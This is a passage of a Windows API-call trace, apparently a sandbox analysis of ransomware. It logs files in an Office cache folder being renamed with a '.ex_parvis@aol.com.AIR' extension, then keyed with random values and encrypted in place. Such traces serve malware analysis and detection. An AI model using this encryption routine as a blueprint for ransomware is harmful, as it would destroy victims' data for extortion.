1 [0152.249] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3a8d30 | out: hHeap=0x2e0000) returned 1 [0152.249] CloseHandle (hObject=0x4a8) returned 1 [0152.249] GetProcessHeap () returned 0x2e0000 [0152.250] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0152.250] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0152.250] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0152.250] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385968 | out: hHeap=0x2e0000) returned 1 [0152.250] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3858c0 | out: hHeap=0x2e0000) returned 1 [0152.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3858c0 [0152.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0152.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0152.250] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0152.250] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0152.250] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", dwFileAttributes=0x80) returned 1 [0152.250] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 77 [0152.250] GetProcessHeap () returned 0x2e0000 [0152.250] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363a50 [0152.250] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" [0152.250] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0152.250] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0152.252] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0152.252] GetProcessHeap () returned 0x2e0000 [0152.252] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0152.252] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=10798080) returned 1 [0152.252] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xa4c400 [0152.253] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0152.253] GetProcessHeap () returned 0x2e0000 [0152.253] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0152.253] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0152.253] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0152.255] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0152.255] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0152.255] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa4c400) returned 0x33d0020 [0152.255] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa4c400) returned 0x3e20020 [0152.256] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.256] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xa4c400, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xa4c400, lpOverlapped=0x0) returned 1 [0152.957] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0152.957] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0152.957] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x80) returned 1 [0152.958] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 88 [0152.958] GetProcessHeap () returned 0x2e0000 [0152.958] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x116) returned 0x336dd8 [0152.958] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0152.958] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" [0152.958] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0152.961] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0152.961] GetProcessHeap () returned 0x2e0000 [0152.961] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0152.961] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=715834) returned 1 [0152.961] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0xaec3a [0152.961] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0152.961] GetProcessHeap () returned 0x2e0000 [0152.961] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0152.961] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0152.961] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0152.963] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0152.963] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0152.963] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x33d0020 [0152.963] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xaec3a) returned 0x3480020 [0152.964] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.964] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0xaec3a, lpOverlapped=0x0) returned 1 [0152.990] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0152.990] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0152.990] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", dwFileAttributes=0x80) returned 1 [0152.990] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 75 [0152.991] GetProcessHeap () returned 0x2e0000 [0152.991] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363a50 [0152.991] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" [0152.991] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0152.991] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0152.993] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0152.993] GetProcessHeap () returned 0x2e0000 [0152.993] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0152.993] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=1463568) returned 1 [0152.993] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x165510 [0152.993] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0152.993] GetProcessHeap () returned 0x2e0000 [0152.993] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0152.993] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0152.994] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0152.996] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0152.996] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0152.996] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x33d0020 [0152.996] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x165510) returned 0x3540020 [0152.996] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0152.996] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x165510, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x165510, lpOverlapped=0x0) returned 1 [0153.063] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0153.063] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0153.063] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", dwFileAttributes=0x80) returned 1 [0153.064] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 76 [0153.064] GetProcessHeap () returned 0x2e0000 [0153.064] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363a50 [0153.064] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" [0153.064] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" [0153.065] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0153.066] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0153.067] GetProcessHeap () returned 0x2e0000 [0153.067] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0153.067] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=36233052) returned 1 [0153.067] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x228df5c [0153.067] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0153.067] GetProcessHeap () returned 0x2e0000 [0153.067] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0153.067] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0153.067] WriteFile (in: hFile=0x4a8, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0153.069] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0153.069] WriteFile (in: hFile=0x4a8, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0153.069] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x33d0020 [0153.070] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x228df5c) returned 0x5660020 [0153.071] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0153.071] ReadFile (in: hFile=0x4a8, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x228df5c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x228df5c, lpOverlapped=0x0) returned 1 [0154.444] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=-36233052, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0154.444] WriteFile (in: hFile=0x4a8, lpBuffer=0x5660020*, nNumberOfBytesToWrite=0x228df5c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x5660020*, lpNumberOfBytesWritten=0x2acf9c8*=0x228df5c, lpOverlapped=0x0) returned 1 [0155.009] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33d0020 | out: hHeap=0x2e0000) returned 1 [0155.161] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x5660020 | out: hHeap=0x2e0000) returned 1 [0155.330] CloseHandle (hObject=0x4a8) returned 1 [0155.661] GetProcessHeap () returned 0x2e0000 [0155.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0155.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0155.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0155.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385770 | out: hHeap=0x2e0000) returned 1 [0155.661] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3856c8 | out: hHeap=0x2e0000) returned 1 [0155.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x3856c8 [0155.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0155.661] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0155.661] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0155.662] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0155.662] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", dwFileAttributes=0x80) returned 1 [0155.663] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 74 [0155.663] GetProcessHeap () returned 0x2e0000 [0155.663] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363a50 [0155.663] lstrcpyW (in: lpString1=0x363a50, lpString2="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" [0155.663] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" [0155.663] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0155.665] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\osetup.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\osetup.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a8 [0155.666] GetProcessHeap () returned 0x2e0000 [0155.666] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0155.666] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=7378792) returned 1 [0155.666] SetFilePointer (in: hFile=0x4a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: 